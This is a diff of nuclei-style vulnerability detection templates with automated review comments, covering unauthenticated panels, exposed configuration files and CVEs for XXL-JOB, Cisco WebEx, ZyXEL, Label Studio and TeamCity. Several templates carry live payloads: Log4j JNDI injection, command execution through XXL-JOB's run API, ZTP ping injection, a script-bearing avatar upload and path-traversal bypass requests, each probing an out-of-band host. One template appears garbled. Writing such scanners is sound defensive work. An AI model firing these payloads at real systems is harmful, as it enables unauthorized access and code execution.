+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.favicon.hash:-1478287554
+ fofa-query: title="teslamate"
+ tags: misconfig,teslamate,unauth
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/settings"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Settings · TeslaMate"
+ - "URLs"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "([0-9.]+)"
+
+# digest: 4b0a00483046022100a34f3dcd06fb844c5e881b8c8352b999dc24c0d0aa7b9f46bd01b87434a24f350221009cc0b519c750367431d73d8576f4815100cc5b7673c8d314a2d4fe7cf747538c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/tongda-meeting-unauth.yaml b/poc/auth/tongda-meeting-unauth.yaml
new file mode 100755
index 0000000000..82e236196b
--- /dev/null
+++ b/poc/auth/tongda-meeting-unauth.yaml
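Review bot: The body extractor `([0-9.]+)` with `group: 1` captures the first run of digits or dots anywhere in the settings page, so the extracted value is whatever number happens to appear first in the HTML rather than any specific field, and the extractor has no `name:` or comment saying what it is meant to pull. Anchor it to a literal prefix that precedes the intended value, give it a `name:` (for example `name: version` if a version string is the goal), or remove the extractor. An unanchored number also risks pulling incidental values such as IDs or coordinates into reports for an endpoint the description itself calls a misconfiguration exposure.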
@@ -0,0 +1,29 @@
+id: tongda-meeting-unauth
+
+info:
+ name: Tongda OA Meeting - Unauthorized Access
+ author: SleepingBag945
+ severity: medium
+ description: |
+ Tongda Meeting Unauthorized Access were Detected.
+ reference:
+ - https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: app="TDXK-通达OA"
+ tags: tongda,unauth,misconfig
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code == 200 && contains(header, 'application/json')
+ - contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":')
+ condition: and
+
+# digest: 4a0a00473045022029eb9d9d545baec4d0f578a10dc5d80bec85c87e3f1cf9ba17933bd242cbb164022100d83d82f1c8bde2f33f1bc331ba22cd156b9984612a602d9e47e5599a498f3dbd:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauth-celery-flower.yaml b/poc/auth/unauth-celery-flower.yaml
index 6a271dab1a..13de5b3b8a 100644
--- a/poc/auth/unauth-celery-flower.yaml
+++ b/poc/auth/unauth-celery-flower.yaml
@@ -20,12 +20,12 @@ http:
 matchers:
 - type: word
 words:
- - 'Dashboard'
- - 'Tasks'
+ - /dashboard
+ - /tasks
+ - github.com/mher/flower
 condition: and

 - type: status
 status:
 - 200
-
-# digest: 490a0046304402201e0bb5dff7fc75fa6e67fe6c429d5cc0331604853cff8663f26770ddfc3fb8b402205d1faee134a18dd60ea20f8f71ce8d437249f728148ec5b1fc8dc7aca6df27de:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/unauth-temporal-web-ui.yaml b/poc/auth/unauth-temporal-web-ui.yaml
index 29f3b9911a..5a81343763 100644
--- a/poc/auth/unauth-temporal-web-ui.yaml
+++ b/poc/auth/unauth-temporal-web-ui.yaml
@@ -15,7 +15,7 @@ info:
 verified: "true"
 max-request: 2
 shodan-query: http.favicon.hash:557327884
- tags: temporal,unauth
+ tags: misconfig,temporal,unauth

 http:
 - method: GET
@@ -34,5 +34,4 @@ http:
 - "contains(body_2, 'nextPageToken') && status_code_2 == 200"
 - "contains(body_2, 'Namespace default is not found.') && status_code_2 == 404"
 condition: or
-
-# digest: 4a0a00473045022100fd80f97bd588e2a7735fbc258ea5b50508f786384b74adc3fafac28f96e32d4602202bee503f1cf7a9ddf2e4c4227239a0475e77a562fbf8ced464bb9cdf0fd21cfa:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e23471f799588e5121a981fa02bd8b1490449748125c06235ea2e1607e2439e3022100a92beae88b23261b448c696a9863d008afae153ea3759317a41ef9958c02e31e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/auth/unauth-ztp-ping.yaml b/poc/auth/unauth-ztp-ping.yaml
new file mode 100644
index 0000000000..dce38605bc
--- /dev/null
+++ b/poc/auth/unauth-ztp-ping.yaml
@@ -0,0 +1,46 @@
+id: unauth-ztp-ping
+
+info:
+ name: Unauthenticated ZyXEL USG ZTP - Detect
+ author: dmartyn
+ severity: high
+ description: |
+ Make a ZyXEL USG with ZTP support, pre CVE-2023-28771 patch, do a DNS lookup by asking it to make an ICMP request.
+ This template can be used to detect hosts potentially vulnerable to CVE-2023-28771, CVE-2022-30525, and other issues, without actually exploiting the vulnerability.
+ reference:
+ - https://www.fullspectrum.dev/the-hunt-for-cve-2023-28771-friends-part-2-fingerprinting-handler/
+ - https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: title:"USG FLEX"
+ tags: misconfig,unauth,zyxel,ztp,rce,oast
+
+http:
+ - raw:
+ - |
+ POST /ztp/cgi-bin/handler HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"command":"ping","dest":"{{interactsh-url}}"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+
+ - type: word
+ part: body
+ words:
+ - "message"
+ - "result"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a0047304502210088ebd31c0c2e0991760e848c1cd717d31e59b52d1eba75b22cfb9561c9e8b44302203bb21fde8ace66f8440da2c84ca7a69c84cd5a96882b50d3d064e3b93b5432de:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/weaver-userselect-unauth.yaml b/poc/auth/weaver-userselect-unauth.yaml
new file mode 100755
index 0000000000..9861f40195
--- /dev/null
+++ b/poc/auth/weaver-userselect-unauth.yaml
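Review bot: The `tags` carry `rce` although the description states that the template only asks the ZTP handler to resolve `{{interactsh-url}}` and does not exploit CVE-2023-28771, so the tag overstates what a hit proves and will route results into RCE-oriented filters and dashboards. Drop `rce` (keeping `misconfig`, `unauth`, `zyxel`, `ztp`, `oast`) or add a sentence to `description` saying that the tag refers to the underlying advisory rather than to what this template performs. A comment above the JSON body, `# a DNS interaction for dest is enough to confirm the unauthenticated handler is reachable; no command is injected`, would also record the assumption the `interactsh_protocol` matcher relies on, particularly since the body and status matchers alone would also be satisfied by a patched device that merely answers the request.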
@@ -0,0 +1,35 @@
+id: weaver-userselect-unauth
+
+info:
+ name: OA E-Office UserSelect Unauthorized Access
+ author: SleepingBag945
+ severity: high
+ description: |
+ OA E-Office UserSelect interface has an unauthorized access vulnerability, through which attackers can obtain sensitive information
+ reference:
+ - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java
+ - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20UserSelect%20未授权访问漏洞.html
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: app="泛微-EOffice"
+ tags: weaver,e-office,oa,unauth
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/UserSelect/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "选择人员"
+ - "/UserSelect/dept.php"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a00473045022100a5327e5c4aa4bba40eb3dd6591e0262f3b68adb18dfe67506e1d01b19d89aea502205e2bc2df2faf6ad056f62b27aeb9871fc23f7f75f6e422837c1f4d1344a9ba6b:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/xxljob-executor-unauth.yaml b/poc/auth/xxljob-executor-unauth.yaml
new file mode 100644
index 0000000000..772187d123
--- /dev/null
+++ b/poc/auth/xxljob-executor-unauth.yaml
@@ -0,0 +1,81 @@ +id: xxljob-executor-unauth + +info: + name: XXL-JOB executor - Unauthorized Access + author: k3rwin + severity: critical + description: | + XXL-JOB is a distributed task scheduling platform. Its core design goals are rapid development, easy learning, lightweight, and easy expansion. The source code is now open and connected to the online product lines of many companies, ready to use out of the box. XXL-JOB is divided into two ends: admin and executor. The former is the background management page, and the latter is the client for task execution. The executor is not configured with authentication by default, and unauthorized attackers can execute arbitrary commands through the RESTful API. + reference: + - https://github.com/jas502n/xxl-job/blob/main/README.md + - https://github.com/vulhub/vulhub/blob/master/xxl-job/unacc/README.md + metadata: + verified: true + max-request: 2 + fofa-query: app="XXL-JOB" + tags: xxljob,unauth,misconfig,rce + +http: + - raw: + - | + POST /run HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Xxl-Job-Access-Token: default_token + Content-Length: 396 + + { + "jobId": {{rand_int(1000)}}, + "executorHandler": "demoJobHandler", + "executorParams": "demoJobHandler", + "executorBlockStrategy": "COVER_EARLY", + "executorTimeout": 0, + "logId": 1, + "logDateTime": 1586629003729, + "glueType": "GLUE_SHELL", + "glueSource": "ping {{interactsh-url}}", + "glueUpdatetime": 1586699003758, + "broadcastIndex": 0, + "broadcastTotal": 0 + } + - | + POST /run HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Xxl-Job-Access-Token: default_token + Content-Length: 396 + + { + "jobId": {{rand_int(1000)}}, + "executorHandler": "demoJobHandler", + "executorParams": "demoJobHandler", + "executorBlockStrategy": "COVER_EARLY", + "executorTimeout": 0, + "logId": 1, + "logDateTime": 1586629003729, + "glueType": "GLUE_POWERSHELL", + "glueSource": "ping {{interactsh-url}}", + "glueUpdatetime": 1586699003758, + 
"broadcastIndex": 0, + "broadcastTotal": 0 + } + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"code":200}' + + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol + words: + - "dns" + +# digest: 4a0a0047304502201267f2958b6162f2a27bae7de33cd563307d68254c033642718abe971f52b2fa022100e392c7bb7e02c9d281798ee931978e2acfc754dd18a8c6f2668d146b73a0fd4d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-webex-log4j-rce.yaml b/poc/cisco/cisco-webex-log4j-rce.yaml new file mode 100644 index 0000000000..ab879def50 --- /dev/null +++ b/poc/cisco/cisco-webex-log4j-rce.yaml 
@@ -0,0 +1,66 @@ +id: cisco-webex-log4j-rce + +info: + name: Cisco WebEx - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications. + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"Cisco WebEx" + tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /orion/login?siteurl=meet HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/orion/login?siteurl=meet&rnd=0.1359184728177283 + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded + + type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&bAjax=true + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 
${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4a0a00473045022042bdc493eb4ec91bbcbcd56ef58972f45032f56c91a340ccc75e523f1953badf022100b70c8852cc0ae3850e5574cc27f06e2eaed76319f53bbb9e1cfe7a4061bd3640:922c64590222798bb761d5b6d8e72950 diff --git a/poc/config/dompdf-config.yaml b/poc/config/dompdf-config.yaml index 38981b690a..5cf2e3c574 100644 --- a/poc/config/dompdf-config.yaml +++ b/poc/config/dompdf-config.yaml @@ -9,8 +9,9 @@ info: classification: cwe-id: CWE-200 metadata: - fofa-query: title="dompdf - The PHP 5 HTML to PDF Converter" verified: true + max-request: 6 + fofa-query: title="dompdf - The PHP 5 HTML to PDF Converter" tags: config,exposure,dompdf http: @@ -36,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bb0497066655da6838308fb2d31e9e1499f89c02c68ead8a38ac1516fc12681a02200985b1f98d0fbb16c2c2b09124119b1af02f34290ebee6fcd09379cbb89e31b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022019ae7446da8cf0c57c637cecd750773679e29ca526116d27a32b066d44aa735d022100d6965160cb2f94abccbd3d1cad0431a1b9cf64c94b1ab9f758c3e0d743993699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/config/joomla-config-dist-file.yaml b/poc/config/joomla-config-dist-file.yaml old mode 100755 new mode 100644 index 023399c215..676958e944 --- a/poc/config/joomla-config-dist-file.yaml +++ b/poc/config/joomla-config-dist-file.yaml 
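Review bot: The positive match rests on an `interactsh_protocol` DNS hit from the JNDI lookup in `username=${jndi:ldap://...}`, which proves the vulnerable Log4j substitution ran, not that a remote class was loaded and executed; with the name `Remote Code Execution` and `severity: critical`, the description should say `The template confirms the JNDI lookup only; code execution depends on the JVM's codebase settings.` The `metadata` block has no `verified` flag, unlike the other detection templates in this patch, so a reader cannot tell whether the `/orion/login?siteurl=meet` injection point was exercised against a live target. The same regex appears three times; a comment above the first saying the later copies exist only to print groups 1 and 2 would stop someone deleting the duplicates.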
@@ -1,35 +1,31 @@ id: joomla-config-dist-file + info: name: Joomla Config Dist File - author: - - l0ne1y - description: |- - joomla配置文件泄露 - php-dist是Joomla创建的用来保存Joomla设置的文件,未经允许的访问会导致敏感信息泄露 + author: oppsec severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序: - http://www.joomla.org/ - 临时修复方案: - 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 - 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + description: configuration.php-dist is a file created by Joomla to save Joomla settings. + tags: config,exposure,joomla + requests: -- matchers: - - type: word - condition: and - words: - - Joomla - - JConfig - - '@package' - - type: word - part: header - words: - - text/plain - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/configuration.php-dist' - method: GET + - method: GET + path: + - "{{BaseURL}}/configuration.php-dist" + + matchers-condition: and + matchers: + - type: word + words: + - "Joomla" + - "JConfig" + - "@package" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 diff --git a/poc/config/openstack-config.yaml b/poc/config/openstack-config.yaml new file mode 100644 index 0000000000..d213636eeb --- /dev/null +++ b/poc/config/openstack-config.yaml 
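Review bot: The rebuilt request block still sits under the legacy `requests:` key (a context line, so untouched by this diff) while every other template in this patch uses `http:`; since the block was rewritten anyway, migrate it to `http:` so it follows the current schema. The new side drops the `remediation` block entirely without carrying the advice over; keep at least `remediation: Remove configuration.php-dist from the web root or block direct access to it.` and add a `metadata` block with `max-request: 1` as the sibling templates have. There is also no `# digest:` line, unlike the other files here, so this template will be unsigned if the repository verifies signatures.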
@@ -0,0 +1,41 @@ +id: openstack-config + +info: + name: Openstack - Infomation Disclosure + author: MayankPandey01 + severity: low + description: | + Openstack exposing Configuration or settings related to the Swift object storage system. + reference: + - https://docs.openstack.org/python-cloudkittyclient/stein/api_reference/info.html + metadata: + max-request: 2 + shodan-query: http.favicon.hash:786533217 + tags: exposure,misconfig,openstack + +http: + - method: GET + path: + - "{{BaseURL}}/info" + - "{{BaseURL}}/v1/info" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + words: + - '{"formpost"' + - '"bulk_' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100c504ae86098c92cdf1075b41054fd034ae21ecebd6d3aba49a10adb53a4c2356022100915148716537ac9841a78f79df37fb16c699ac1852fec8448ebb9746215f4d40:922c64590222798bb761d5b6d8e72950 diff --git a/poc/config/weaver-mysql-config-info-leak.yaml b/poc/config/weaver-mysql-config-info-leak.yaml new file mode 100644 index 0000000000..85dad0d119 --- /dev/null +++ b/poc/config/weaver-mysql-config-info-leak.yaml 
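Review bot: The `reference` URL points at the python-cloudkittyclient API docs, which have nothing to do with the Swift `/info` discovery endpoint that the paths and the `{"formpost"` / `"bulk_` match actually probe; replace it with the Swift object-storage API "Discoverability" documentation. Swift serves `/info` by design (it is switched off through the proxy-server configuration, so confirm the exact option name against current docs), so the description should say that the finding is the capability listing being reachable from the Internet rather than imply a data leak. `Infomation` in `name` is a typo for `Information`.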
@@ -0,0 +1,30 @@ +id: weaver-mysql-config-exposure + +info: + name: OA E-Office mysql_config.ini - Information Disclosure + author: SleepingBag945 + severity: high + description: | + E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-EOffice" + tags: ecology,weaver,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/mysql_config.ini" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header,"text/plain")' + - 'contains_all(body,"datapassword", "datauser")' + condition: and + +# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950 diff --git a/poc/config/wp-superstorefinder-misconfig.yaml b/poc/config/wp-superstorefinder-misconfig.yaml new file mode 100644 index 0000000000..a1a731a66a --- /dev/null +++ b/poc/config/wp-superstorefinder-misconfig.yaml 
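Review bot: The template `id` (`weaver-mysql-config-exposure`) does not match the file name `weaver-mysql-config-info-leak.yaml`; nuclei tooling keys on the id, so align one with the other. The `tags` list `ecology` and `lfi` for what is a direct fetch of `mysql_config.ini` on E-Office: there is no file-inclusion primitive and the product is E-Office rather than Ecology, so `tags: weaver,e-office,oa,config,exposure` describes the check. The `contains(header,"text/plain")` clause will miss servers that hand out `.ini` files as `application/octet-stream`; since `contains_all(body,"datapassword", "datauser")` is already specific, the content-type clause could be dropped.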
@@ -0,0 +1,33 @@ +id: wp-superstorefinder-misconfig + +info: + name: Superstorefinder WP-plugin - Security Misconfigurations + author: r3Y3r53 + severity: medium + description: | + Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities. + reference: + - https://cxsecurity.com/issue/WLB-2021010145 + - https://www.exploitalert.com/view-details.html?id=36983 + metadata: + verified: true + max-request: 1 + publicwww-query: /wp-content/plugins/superstorefinder-wp/ + google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php" + tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig + +http: + - raw: + - | + GET /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")' + - 'contains(content_type, "text/html")' + condition: and + +# digest: 490a0046304402205624314a7fa843184b0006a4166011527395e568b8ad05b057c6736e989da9ba02200811b24c1e44539543fbb7c61236aa51bea06d2e84315390ed2377fb5f156f91:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-25212.yaml b/poc/cve/CVE-2019-25212.yaml new file mode 100644 index 0000000000..1404981387 --- /dev/null +++ b/poc/cve/CVE-2019-25212.yaml 
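Review bot: The `description` is generic boilerplate about security misconfiguration and never says what the request exposes; from the matcher (`Name`, `CategoriesTags` and `email` in a 200 HTML response from `exportAjax.php`) the finding is an unauthenticated store-data export. Replace it with something like `description: The Super Store Finder plugin's ssf-wp-admin/pages/exportAjax.php endpoint returns the store list (names, categories, contact emails) without authentication.` The `raw` block could also be a plain `method: GET` / `path:` entry, as the other single-request templates in this patch are written.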
@@ -0,0 +1,59 @@ +id: CVE-2019-25212 + +info: + name: > + video carousel slider with lightbox <= 1.0.6 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The video carousel slider with lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2019-25212 + metadata: + fofa-query: "wp-content/plugins/wp-responsive-video-gallery-with-lightbox/" + google-query: inurl:"/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/" + shodan-query: 'vuln:CVE-2019-25212' + tags: cve,wordpress,wp-plugin,wp-responsive-video-gallery-with-lightbox,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-responsive-video-gallery-with-lightbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file 
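Review bot: The `name` calls the plugin `video carousel slider with lightbox` while every path and query uses the slug `wp-responsive-video-gallery-with-lightbox`; reconcile the two, or state the slug in the description, so a reader can tell they are the same plugin. The check is readme-version only (`Stable tag` <= 1.0.6) and cannot see whether the plugin is active or the admin-only injection reachable, which is presumably why `severity: low` sits next to a 9.1 CVSS; a description note such as `Version detection only; exploitation requires administrator credentials.` would explain the gap. The two `Stable tag` extractors differ only in `internal: true` (one feeds `compare_versions`, one is for output); a comment saying so would stop someone "deduplicating" them.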
diff --git a/poc/cve/CVE-2023-47115.yaml b/poc/cve/CVE-2023-47115.yaml new file mode 100644 index 0000000000..c006620cf3 --- /dev/null +++ b/poc/cve/CVE-2023-47115.yaml 
@@ -0,0 +1,96 @@ +id: CVE-2023-47115 + +info: + name: Label Studio - Cross-Site Scripting + author: isacaya + severity: high + description: | + Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. + impact: | + Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. + remediation: | + Update to version 1.9.2. + reference: + - https://github.com/advisories/GHSA-q68h-xwq5-mm7x + - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development + - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49 + - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26 + - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L + cvss-score: 7.1 + cve-id: CVE-2023-47115 + cwe-id: CWE-79 + metadata: + max-request: 6 + verified: true + shodan-query: http.favicon.hash:-1649949475 + tags: cve,cve2023,xss,authenticated,intrusive,label-studio + +http: + - raw: + - | + GET /user/login/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /user/signup/?&next=/projects/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false + + - | + GET /api/current-user/whoami HTTP/1.1 + Host: {{Hostname}} + + - | + POST /api/users/{{id}}/avatar/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF + + ------WebKitFormBoundarytZZRQ9D2LS0PMsHF + Content-Disposition: form-data; name="avatar"; filename="nuclei.html" + Content-Type: image/png + + 
{{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}} + ------WebKitFormBoundarytZZRQ9D2LS0PMsHF + + - | + GET /api/current-user/whoami HTTP/1.1 + Host: {{Hostname}} + + - | + GET {(unknown)} HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: xpath + name: csrftoken + internal: true + attribute: value + xpath: + - '/html/body/div/form/input' + + - type: json + part: body + name: id + internal: true + json: + - '.id' + + - type: json + part: body + name: filename + internal: true + json: + - '.avatar' + + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(header, 'text/html')" + - 'contains(body, "")' + condition: and +# digest: 4a0a004730450221008999745df0370a0f36f1d91079345bb01c335595f037e4fd623dd2ff3a725d6c02200997bd78ea3074a15dd1d76378aa1cf7d1286e84d5d7282642e400804ab42ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-27199.yaml b/poc/cve/CVE-2024-27199.yaml new file mode 100644 index 0000000000..feb849520c --- /dev/null +++ b/poc/cve/CVE-2024-27199.yaml 
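Review bot: As rendered here the final request reads `GET {(unknown)} HTTP/1.1` and the last matcher is `contains(body, "")`, which can never fail; if this is how the file was committed the template is broken, and if it is a rendering artifact the intended lines are `GET {{filename}} HTTP/1.1` (the `.avatar` path extracted from the second `whoami`) and `contains(body, "<script>alert(document.domain)</script>")`, the string the hex payload decodes to. Please check the committed file. The second request registers a throw-away account (`email={{randstr_1}}%40...`) and the fourth uploads an avatar that is never removed; `intrusive` is tagged, but the description should state that an account and a file are left behind on the target.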
@@ -0,0 +1,37 @@ +id: CVE-2024-27199 + +info: + name: TeamCity < 2023.11.4 - Authentication Bypass + author: DhiyaneshDk + severity: high + description: | + In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible + reference: + - https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-27199 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cwe-id: CWE-23 + metadata: + verified: true + max-request: 3 + shodan-query: http.component:"TeamCity" + tags: cve,cve2024,teamcity,jetbrains,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/res/../admin/diagnostic.jsp" + - "{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp" + - "{{BaseURL}}/update/../admin/diagnostic.jsp" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains_all(body, "Debug Logging", "CPU & Memory Usage")' + condition: and +# digest: 490a0046304402207d46ec6991f8498ff8c74ec6ebfe0f59f19210620cab88c23c7761c7701b640102201246e4baea4f5b436b45be21c4f66bbe35e8a5f3769b78de38ee94253f331fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-5416.yaml b/poc/cve/CVE-2024-5416.yaml new file mode 100644 index 0000000000..e180247900 --- /dev/null +++ b/poc/cve/CVE-2024-5416.yaml 
